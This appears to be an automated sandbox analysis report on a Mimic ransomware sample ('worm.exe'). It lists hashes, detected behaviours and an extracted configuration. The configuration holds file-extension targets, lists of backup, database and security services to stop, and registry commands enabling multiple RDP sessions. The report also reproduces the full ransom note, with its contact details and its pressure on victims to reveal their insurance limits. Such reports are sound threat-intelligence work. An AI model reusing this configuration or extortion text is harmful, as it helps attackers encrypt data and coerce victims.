General

  • Target

    worm.exe

  • Size

    3.7MB

  • Sample

    240515-yerbcsgh68

  • MD5

    d3b46fbcaac57a146657238ba2b24008

  • SHA1

    257acef818f0e80e68db8767b37633d0f12542a7

  • SHA256

    73f648f258b8863530f285747a09cdf4909198211ffc6c2df68bf0635160c983

  • SHA512

    a61834f7c00ff22eba698aa98c5cf0346e8c6cacce74be13fd4c1dbada5d4e1831261a79724c37f1e85a0c3981d4b2019ec89994af2f23080139f907a165769e

  • SSDEEP

    98304:6gwRBDvguPPOPwrHIRwFHO92037ngXAjpDsbs9KMOz:6gMDvFHG92Y5jpYbvMG

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\011A427C-D9A5-B6EA-EAF5-8C674D0F8EDC\global_options.ini

Ransom Note
26=worm
27=sql;sqlite;sqlite3;sqlitedb;mdf;mdb;adb;db;db3;dbf;dbs;udb;dbv;dbx;edb;exb;1cd;fdb;idb;mpd;myd;odb;xls;xlsx;doc;docx;bac;bak;back;zip;rar;dt;4dd;4dl;abcddb;abs;abx;accdb;accdc;accde;accdr;accdt;accdw;accft;ade;adf;adn;adp;alf;arc;ask;bacpac;bdf;btr;cat;cdb;chck;ckp;cma;cpd;dacpac;dad;dadiagrams;daschema;db-shm;db-wal;db2;dbc;dbt;dcb;dct;dcx;ddl;dlis;dp1;dqy;dsk;dsn;dtsx;dxl;eco;ecx;epim;fcd;fic;fm5;fmp;fmp12;fmpsl;fol;fp3;fp4;fp5;fp7;fpt;frm;gdb;grdb;gwi;hdb;his;hjt;ib;icg;icr;ihx;itdb;itw;jet;jtx;kdb;kexi;kexic;kexis;lgc;lut;lwx;maf;maq;mar;mas;mav;maw;mdn;mdt;mrg;mud;mwb;ndf;nnt;nrmlib;ns2;ns3;ns4;nsf;nv;nv2;nwdb;nyf;oqy;ora;orx;owc;p96;p97;pan;pdb;pdm;pnz;qry;qvd;rbf;rctd;rod;rodx;rpd;rsd;s2db;sas7bdat;sbf;scx;sdb;sdc;sdf;sis;sl3;spq;sqlite2;te;temx;tmd;tps;trc;trm;udl;usr;v12;vis;vpd;vvv;wdb;wmdb;wrk;xdb;xld;xmlff;
28=386;cmd;deskthemepack;diagcab;diagcfg;diagpkg;dll;info;mui;sys;theme;tmp;
29=steamapps;Cache;Boot;Chrome;Firefox;Mozilla;Mozilla Firefox;MicrosoftEdge;Internet Explorer;Tor Browser;Opera;Opera Software;Common Files;Config.Msi;Intel;Microsoft;Microsoft Shared;Microsoft.NET;MSBuild;MSOCache;Packages;PerfLogs;ProgramData;System Volume Information;tmp;Temp;USOShared;Windows;Windows Defender;Windows Journal;Windows NT;Windows Photo Viewer;Windows Security;Windows.old;WindowsApps;WindowsPowerShell;WINNT;$RECYCLE.BIN;$WINDOWS.~BT;$Windows.~WS;:\Users\Public\;:\Users\Default\;
30=desktop.ini;iconcache.db;thumbs.db;
31=AcronisAgent;ARSM;backup;BackupExecAgentAccelerator;BackupExecAgentBrowser;BackupExecDiveciMediaService;BackupExecJobEngine;BackupExecManagementService;BackupExecRPCService;BackupExecVSSProvider;CAARCUpdateSvc;CASAD2DWebSvc;ccEvtMgr;ccSetMgr;Culserver;dbeng8;dbsrv12;DefWatch;FishbowlMySQL;GxBlr;GxCIMgr;GxCVD;GxFWD;GxVss;memtas;mepocs;msexchange;MSExchange$;msftesql-Exchange;msmdsrv;MSSQL;MSSQL$;MSSQL$KAV_CS_ADMIN_KIT;MSSQL$MICROSOFT##SSEE;MSSQL$MICROSOFT##WID;MSSQL$SBSMONITORING;MSSQL$SHAREPOINT;MSSQL$VEEAMSQL2012;MSSQLFDLauncher$SBSMONITORING;MSSQLFDLauncher$SHAREPOINT;MSSQLServerADHelper100;MVArmor;MVarmor64;svc$;sophos;RTVscan;MySQL57;PDVFSService;QBCFMonitorService;QBFCService;QBIDPService;QBVSS;SavRoam;SQL;SQLADHLP;sqlagent;SQLAgent$KAV_CS_ADMIN_KIT;SQLAgent$SBSMONITORING;SQLAgent$SHAREPOINT;SQLAgent$VEEAMSQL2012;sqlbrowser;Sqlservr;SQLWriter;stc_raw_agent;tomcat6;veeam;VeeamDeploymentService;VeeamNFSSvc;VeeamTransportSvc;vmware-converter;vmware-usbarbitator64;VSNAPVSS;vss;wrapper;WSBExchange;YooBackup;YooIT;
32=agntsvc;AutodeskDesktopApp;axlbridge;bedbh;benetns;bengien;beserver;CoreSync;Creative Cloud;dbeng50;dbsnmp;encsvc;EnterpriseClient;fbguard;fbserver;fdhost;fdlauncher;httpd;isqlplussvc;msaccess;MsDtSrvr;msftesql;mspub;mydesktopqos;mydesktopservice;mysqld;mysqld-nt;mysqld-opt;ocautoupds;ocomm;ocssd;oracle;pvlsvr;node;java;python;wpython;QBDBMgr;QBDBMgrN;QBIDPService;qbupdate;QBW32;QBW64;Raccine;Raccine_x86;RaccineElevatedCfg;RaccineSettings;VeeamDeploymentSvc;RAgui;raw_agent_svc;SimplyConnectionManager;sqbcoreservice;sql;sqlagent;sqlbrowser;sqlmangr;sqlservr;sqlwriter;Ssms;Sysmon;Sysmon64;tbirdconfig;tomcat6;vsnapvss;vxmon;wdswfsafe;wsa_service;wxServer;wxServerView;xfssvccon;1cv8s;1cv8;1cv8c;
33=add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 0x1 /f;reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fSingleSessionPerUser" /t REG_DWORD /d 0x0 /f;
34=1
35=2
36=0
37=0
38=0
39=1
40=1
41=1
42=1
43=1
44=1
45=1
46=1
47=0
48=1
49=1
50=1
51=0
53=1
54=0
55=1
56=1
57=1
58=1
59=1
60=1
61=1
62=1
63=Hello my dear friend (Do not scan the files with antivirus in any case. In case of data loss, the consequences are yours)
Your data is encrypted
Your decryption ID is ID_PLACEHOLDER
Unfortunately for you, a major IT security weakness left you open to attack, your files have been encrypted
The only method of recovering files is to purchase decrypt tool and unique key for you.
If you want to recover your files, write us to this e-mail: [email protected]
In case of no answer in 24 hours write us to this backup e-mail: [email protected]
Our online operator is available in the messenger Telegram: @DataSupport911 or https://t.me/DataSupport911
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
Contact us soon, because those who don't have their data leaked in our press release blog and the price they'll have to pay will go up significantly.

Attention!

Do not rename encrypted files.
Do not try to decrypt your data using third party software - it may cause permanent data loss.
We are always ready to cooperate and find the best way to solve your problem.
The faster you write - the more favorable conditions will be for you.
Our company values its reputation. We give all guarantees of your files decryption.

What are your recommendations?
- Never change the name of the files, if you want to manipulate the files, be sure to back them up. If there are any problems with the files, we are not responsible for them.
- Never work with intermediary companies because they charge you more money. For example, if we ask you for 50,000$, they will tell you 55,000$. Don't be afraid of us, just email us.

Very important!
For those who have cyber insurance against ransomware attacks.
Insurance companies require you to keep your insurance information secret, this is to never pay the maximum amount specified in the contract or to pay nothing at all, disrupting negotiations.
The insurance company will try to derail negotiations in any way they can so that they can later argue that you will be denied coverage because your insurance does not cover the ransom amount.
For example your company is insured for 10 million dollars, while negotiating with your insurance agent about the ransom he will offer us the lowest possible amount, for example 100 thousand dollars,
we will refuse the paltry amount and ask for example the amount of 15 million dollars, the insurance agent will never offer us the top threshold of your insurance of 10 million dollars.
He will do anything to derail negotiations and refuse to pay us out completely and leave you alone with your problem. If you told us anonymously that your company was insured for 10 million and other
important details regarding insurance coverage, we would not demand more than 10 million in correspondence with the insurance agent. That way you would have avoided a leak and decrypted your information.
But since the sneaky insurance agent purposely negotiates so as not to pay for the insurance claim, only the insurance company wins in this situation. To avoid all this and get the money on the insurance,
be sure to inform us anonymously about the availability and terms of insurance coverage, it benefits both you and us, but it does not benefit the insurance company. Poor multimillionaire insurers will not
starve and will not become poorer from the payment of the maximum amount specified in the contract, because everyone knows that the contract is more expensive than money, so let them fulfill the conditions
prescribed in your insurance contract, thanks to our interaction.
66=1
Emails
URLs

https://t.me/DataSupport911

Targets

    • Detects Mimic ransomware

    • Mimic

      Ransomware family was first exploited in the wild in 2022.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • Modifies system executable filetype association

    • Adds Run key to start application

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

MITRE ATT&CK Enterprise v15

Tasks